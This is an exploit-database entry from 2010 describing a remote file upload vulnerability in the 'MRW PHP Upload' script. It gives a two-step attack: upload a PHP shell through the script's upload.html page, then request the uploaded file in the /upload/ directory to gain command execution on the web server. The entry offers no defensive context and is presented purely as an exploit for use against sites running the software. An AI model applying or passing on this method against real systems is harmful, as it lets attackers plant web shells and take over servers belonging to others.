id: 10872
date: 02/12/2010
title: MRW PHP shell upload vulnerability
author: Phenom
cves: 

==================================
MRW PHP shell upload vulnerability
==================================

# Exploit Title: MRW PHP Upload Remote file upload Vulnerability
# Date: 12/02/2010
# Author: Phenom
# Software Link: http://www.mrwebmaster.it/_store/script/php_luke_mrw_upload.zip
# Version: 
# Tested on: Windows xp sp3

#######   MRW PHP Upload Remote File Upload Vulnerability   #####################
#
#       Author : Phenom
#
#       vendor : www.lukeonweb.net
#
#################################################################################

####### Exploit #################################################################
#
#     1- http://site.com/path/upload.html
#
#         upload your shell 
#
#     2- http://site.com/path/upload/yourshell.php
#
#         get your shell
#
#################################################################################




#  0day.today [2023-03-21]  #